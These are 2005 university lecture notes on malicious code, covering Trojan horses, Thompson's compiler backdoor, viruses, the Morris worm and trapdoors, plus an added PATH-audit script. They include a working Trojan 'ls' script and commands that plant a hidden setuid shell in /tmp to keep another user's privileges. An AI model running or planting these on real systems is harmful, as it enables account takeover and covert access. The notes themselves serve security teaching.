
Spring 2005, Syracuse University Lecture Notes for CIS/CSE 785: Computer Security

Malicious Code

  1. Kinds of Malicious Code

  • Trojan horse

  • Virus

  • Logic bomb, time bomb

  • trapdoor, backdoor

  • Worm

  2. Trojan Horse

Trojan horse: a piece of malicious code that, in addition to its primary (expected) effect, has a second, non-obvious malicious effect.

  • The ls Trojan horse.

    • If somebody visits your directory, is it possible to trick that user into running a Trojan horse program?

    • Yes, if "." is at the beginning of the victim's PATH environment variable: a script named ls in your directory is found before /bin/ls.

    #!/bin/sh
    # Contents of the file "ls" left in the attacker's directory; the victim
    # runs it instead of /bin/ls because "." comes first in PATH.
    cp /bin/sh /tmp/.xxsh     # hidden copy of the shell, owned by the victim
    chmod 4777 /tmp/.xxsh     # setuid, so it later runs with the victim's privileges
    rm ./ls                   # remove the Trojan so the real ls is found from now on
    ls $*                     # run the real ls so the victim sees the expected output
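The condition the ls Trojan horse depends on is a PATH that searches the current directory (or any directory other users can write to) before the system directories. As an added example that is not part of the lecture notes, the POSIX shell function below audits a PATH value for exactly those entries; the function name and sample PATH values are constructed for this illustration.

```shell
#!/bin/sh
# audit_path: report PATH entries that let a Trojan "ls" dropped in the
# current directory (or a shared directory) shadow the real /bin/ls.
# Flags "." and empty entries (both mean the current directory), relative
# entries, and absolute entries that are world-writable directories.
# Prints one line per finding; returns 1 if anything was found, else 0.
audit_path() {
    path="${1-$PATH}"
    bad=0
    rest="$path:"                      # trailing ':' so the last entry is seen
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"
        rest="${rest#*:}"
        case "$entry" in
            ""|.)
                echo "current-directory entry: '$entry'"; bad=1 ;;
            /*)
                # -H follows a symlinked entry (e.g. /bin -> usr/bin); -prune
                # keeps the test on the directory itself; -perm -002 matches
                # when the others-write bit is set.
                if [ -d "$entry" ] && [ -n "$(find -H "$entry" -prune -perm -002)" ]; then
                    echo "world-writable entry: $entry"; bad=1
                fi ;;
            *)
                echo "relative entry: '$entry'"; bad=1 ;;
        esac
    done
    return "$bad"
}

# Constructed example: the PATH the lecture describes, with "." first.
audit_path ".:/usr/bin:/bin" || echo "PATH is unsafe"
```

Running it with no argument audits the caller's own PATH, which is the check to put in a login script.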

  • Ken Thompson's Famous Trojan Horses

    • "Reflections on Trusting Trust", Turing Award lecture.

    • Goal: add a Trojan horse to the login program so that a special password logs one into the system. However, the Trojan horse should be difficult to detect and to fix.

    • Approach 1: Change the login binary.

      • This is easy to fix: just recompile it from login.c.

      • What about also changing login.c? This is easy to detect if somebody reads the source. Q: how can it be made more difficult to detect?

    • Approach 2: Change compiler.c so that it recognizes login.c, and change login.c back to normal. When the compiler compiles login.c, it automatically adds the Trojan horse to the login binary.

      • What if somebody reads compiler.c? The Trojan horse in compiler.c can be detected; they can get another (clean) copy of compiler.c and compile it.

    • Approach 3: Change compiler.c so that a Trojan horse is added to the binary whenever compiler.c or login.c is compiled. After we get the compiler binary, we change compiler.c back to normal.

      • The Trojan horse is now built into the compiler binary.

      • Unless somebody looks at the compiler binary, the Trojan horse is difficult to detect: none of the source files contain any Trojan horse; the Trojan horses are added by the compiler.

      • To remove the Trojan horse, one has to change the compiler program itself, not the sources.

  3. Virus

  • Must be activated by being executed. There are various ways to get activated:

    • Running an infected program

    • Opening an attachment (Melissa and Love Bug: macro viruses)

    • Reading email (BubbleBoy virus)

    • Appended viruses

    • Viruses that surround a program

    • Boot-sector viruses

  • Solutions

    • No general cure for viruses

    • Virus checkers are effective against known viruses only

  • Truths and Misconceptions about viruses

    • Viruses can infect systems other than PCs/MS-DOS/Windows

    • Q: why are there not many viruses on Unix?

    • Viruses can appear in data files: e.g. Microsoft Word macro viruses

  4. Worms

  • History of the Internet Worm

    • Nov. 2, 1988, Robert T. Morris Jr.

    • His father, Robert T. Morris Sr. (at the NSA), and Ken Thompson wrote a paper about network security in 1979.

    • Flaw in the worm: it failed to check whether another copy of the worm was already running on the host.

  • What made the worm a successful attack:

    • Difference from virus: propagate via networks

    • Bug in fingerd: buffer overflow

    • Backdoor in sendmail: DEBUG mode

    • Took advantage of a mechanism used to simplify resource sharing

    • Weak passwords: password guessing

      • The worm carried a short list of common passwords (432 passwords), e.g. "guest", "passwords", "aaa", "help", "coffee", "coke", etc.

      • It used the system dictionary if the short list failed

    • Disguise:

  • More Malicious Code: Code Red

    • Middle of 2001

    • Targeted Microsoft's Internet Information Server (IIS)

    • Used a buffer overflow

  5. Trapdoors

  • Example of trapdoors

  • Another example: What is a fast way to gain somebody's full privileges permanently when he/she leaves the computer unattended for a short period of time?

    • % cp /bin/sh /tmp/.xxsh

    • % chmod 4777 /tmp/.xxsh

  • Causes of trapdoors:

    • Forgotten and never removed

    • Intentionally leave them in the program for testing

    • Intentionally leave them for maintenance

    • Intentionally leave them as a covert means of access to the component

Wenliang Du Malicious Code: Page of 8/8/2018
